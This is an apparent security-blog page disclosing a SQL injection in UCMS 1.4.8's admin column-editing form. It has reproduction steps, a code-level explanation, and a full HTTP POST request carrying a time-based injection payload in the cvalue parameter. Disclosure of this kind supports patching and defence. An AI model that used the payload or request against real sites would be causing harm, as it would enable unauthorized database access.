<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>&#39;UCMS v1.4.8 SQL injection cvalue parameter&#39; | LS-Loophole</title>
  <meta name="keywords" content="">
  <meta name="description" content="&#39;UCMS v1.4.8 SQL injection cvalue parameter&#39; | LS-Loophole">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="UCMS v.1.5.0 Command executionVulnerability Type :Eval injection Vulnerability Version :1.5.0 Recurring environment: Windows 10 PHP 5.4.5 Apache 2.4.23  Vulnerability Description AND recurrence:1、The">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;UCMS v.1.5.0 Command execution&#39;">
<meta property="og:url" content="https://ls-loophole.github.io/2020/09/22/UCMS%20v.1.5.0%20Command%20execution/index.html">
<meta property="og:site_name" content="LS-Loophole">
<meta property="og:description" content="UCMS v.1.5.0 Command executionVulnerability Type :Eval injection Vulnerability Version :1.5.0 Recurring environment: Windows 10 PHP 5.4.5 Apache 2.4.23  Vulnerability Description AND recurrence:1、The">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ls-loophole.github.io/imgss/34.png">
<meta property="og:image" content="https://ls-loophole.github.io/imgss/35.png">
<meta property="og:image" content="https://ls-loophole.github.io/imgss/36.png">
<meta property="og:image" content="https://ls-loophole.github.io/imgss/37.png">
<meta property="og:image" content="https://ls-loophole.github.io/imgss/38.png">
<meta property="og:image" content="https://ls-loophole.github.io/imgss/39.png">
<meta property="article:published_time" content="2020-09-22T11:54:55.537Z">
<meta property="article:modified_time" content="2020-09-22T11:58:26.443Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ls-loophole.github.io/imgss/34.png">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 5.2.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/avatar.jpg" />
</a>
<div class="author">
    <span></span>
</div>

<div class="icon">
    
</div>




<ul>
    <li><div class="all active" data-rel="全部文章">全部文章<small>(5)</small></div></li>
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div><a class="about  hasFriend  site_url"  href="/about">关于</a><a style="width: 50%"  class="friends">友链</a></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="5">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" />
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        <a  class="全部文章 "
           href="/2020/09/22/UCMS%20v.1.5.0%20Command%20execution/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="&#39;UCMS v.1.5.0 Command execution&#39;">&#39;UCMS v.1.5.0 Command execution&#39;</span>
            <span class="post-date" title="2020-09-22 19:54:55">2020/09/22</span>
        </a>
        
        <a  class="全部文章 "
           href="/2020/09/22/Ready%20UCMS%20v1.5.0%20XSS%20dir%20parameter/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="&#39;UCMS v1.5.0 XSS dir parameter&#39;">&#39;UCMS v1.5.0 XSS dir parameter&#39;</span>
            <span class="post-date" title="2020-09-22 19:48:41">2020/09/22</span>
        </a>
        
        <a  class="全部文章 "
           href="/2020/09/22/UCMS%20v1.5.0%20XSS%20cedit%20cname%20parameters/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="&#39;UCMS v1.5.0 XSS cedit cname parameters&#39;">&#39;UCMS v1.5.0 XSS cedit cname parameters&#39;</span>
            <span class="post-date" title="2020-09-22 19:34:59">2020/09/22</span>
        </a>
        
        <a  class="全部文章 "
           href="/2020/09/22/UCMS%20v1.5.0%20mysql_dbname%20parameter%20has%20XSS%20vulnerability/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="&#39;UCMS v1.5.0 mysql_dbname parameter has XSS vulnerability&#39;">&#39;UCMS v1.5.0 mysql_dbname parameter has XSS vulnerability&#39;</span>
            <span class="post-date" title="2020-09-22 19:07:49">2020/09/22</span>
        </a>
        
        <a  class="全部文章 "
           href="/2020/09/22/UCMS%20v1.4.8%20SQL%20injection%20cvalue%20parameter/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="&#39;UCMS v1.4.8 SQL injection cvalue parameter&#39;">&#39;UCMS v1.4.8 SQL injection cvalue parameter&#39;</span>
            <span class="post-date" title="2020-09-22 19:01:23">2020/09/22</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-UCMS v1.4.8 SQL injection cvalue parameter" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">&#39;UCMS v1.4.8 SQL injection cvalue parameter&#39;</h1>
    
    <div class="article-meta">
        
        
        
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2020-09-22 19:32:44'>2020-09-22 19:01</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#UCMS-v1-4-8-SQL-injection-cvalue-parameter"><span class="toc-text">UCMS v1.4.8 SQL injection cvalue parameter</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Vulnerability-Type"><span class="toc-text">Vulnerability Type :</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Vulnerability-Version"><span class="toc-text">Vulnerability Version :</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Recurring-environment"><span class="toc-text">Recurring environment:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Vulnerability-Description-AND-recurrence"><span class="toc-text">Vulnerability Description AND recurrence:</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="UCMS-v1-4-8-SQL-injection-cvalue-parameter"><a href="#UCMS-v1-4-8-SQL-injection-cvalue-parameter" class="headerlink" title="UCMS v1.4.8 SQL injection cvalue parameter"></a>UCMS v1.4.8 SQL injection cvalue parameter</h1><h2 id="Vulnerability-Type"><a href="#Vulnerability-Type" class="headerlink" title="Vulnerability Type :"></a>Vulnerability Type :</h2><p>SQL Injection</p>
<h2 id="Vulnerability-Version"><a href="#Vulnerability-Version" class="headerlink" title="Vulnerability Version :"></a>Vulnerability Version :</h2><p>1.4.8</p>
<h2 id="Recurring-environment"><a href="#Recurring-environment" class="headerlink" title="Recurring environment:"></a>Recurring environment:</h2><ul>
<li>Windows 10</li>
<li>PHP 5.4.5</li>
<li>Apache 2.4.23</li>
</ul>
<h2 id="Vulnerability-Description-AND-recurrence"><a href="#Vulnerability-Description-AND-recurrence" class="headerlink" title="Vulnerability Description AND recurrence:"></a>Vulnerability Description AND recurrence:</h2><p>Vulnerability recurrence:<br>Visit URL: <a target="_blank" rel="noopener" href="http://www.ucm1.4.8.com/ucms/?do=sadmin">http://www.ucm1.4.8.com/ucms/?do=sadmin</a><br>Add column name: cnvd</p>
<p><img src="/imgss/1.png"></p>
<p>Access section configuration URL:<br><a target="_blank" rel="noopener" href="http://www.ucm1.4.8.com/ucms/index.php?do=sadmin_cedit&amp;cid=1">http://www.ucm1.4.8.com/ucms/index.php?do=sadmin_cedit&amp;cid=1</a></p>
<p><img src="/imgss/2.png"></p>
<pre><code>Select &quot;前台链接 &quot; for the column type, and enter the link address to SQL injection PayLoad:&#39;;select sleep(5)#</code></pre>
<p><img src="/imgss/3.png"></p>
<p>After the burp is sent, you can see that the injection is successfully delayed!</p>
<p><img src="/imgss/4.png"></p>
<p>Vulnerability analysis:</p>
<ol>
<li>The vulnerability here is very simple. The vulnerability is on line 124 of /ucms/sadmin/ceditpost.php. It is directly assigned to the $cvalue variable without any filtering.</li>
</ol>
<p><img src="/imgss/5.png"></p>
<ol start="2">
<li>And there is no filtering after the $cvalue variable, and the SQL statement is directly brought in for query, because this leads to SQL injection!</li>
</ol>
<p><img src="/imgss/6.png"></p>
<p>Payload:</p>
<pre><code>POST /ucms/index.php?do=sadmin_ceditpost HTTP/1.1
Host: www.ucm1.4.8.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.ucm1.4.8.com/ucms/index.php?do=sadmin_cedit&amp;cid=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 625
Connection: close
Cookie: admin_fff17a=admin; psw_fff17a=eedd6b12458a8dbbdc1b529f18e833cc; token_fff17a=205d550b; admin_df2e08=admin; psw_df2e08=a7de3a831dfdcd5d87a47b279d05f98e; token_df2e08=00010872; admin_7fc7b0=admin; psw_7fc7b0=af9330f374f5208900cadc29f1fa9fe7; token_7fc7b0=68c29e18; admin_2e551a=admin; psw_2e551a=0d3a88692ff598ee986b97caa0a5c1d5; token_2e551a=b947f9f5; admin_a3ab8b=admin; psw_a3ab8b=ad1f99cd3dd4af7e7d4fc7014ed15014; token_a3ab8b=3171a719
Upgrade-Insecure-Requests: 1


uuu_token=3171a719&amp;cid=1&amp;fid=0&amp;cname=cnvd&amp;channeldomain=&amp;cnote=&amp;ckind=3&amp;ifshowadmin=0&amp;ifshowleft=0&amp;ifshownav1=on&amp;channel_url1=%2F%28cid%29%2F&amp;channel_urlcache1=0&amp;template1=page.php&amp;articletable=ucms_article&amp;listadminuid=on&amp;ifshownav2=on&amp;temppage_size=15&amp;temppage_order=id+desc&amp;channel_url2=%2F%28cid%29%2F&amp;channel_urlcache2=0&amp;template2=page.php&amp;channel_pageurl=%2F%28cid%29%2Fpage_%28page%29.html&amp;channel_pageurlcache=0&amp;templatelist=list.php&amp;channel_articleurl=%2F%28cid%29%2F%28id%29.html&amp;channel_articleurlcache=0&amp;templatearticle=article.php&amp;ifshownav5=on&amp;cvalue=%27%3Bselect+sleep%285%29%23&amp;ifshownav3=on&amp;cvalue1=&amp;corder=5
</code></pre>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 jaytp@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2020 LS-Loophole
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
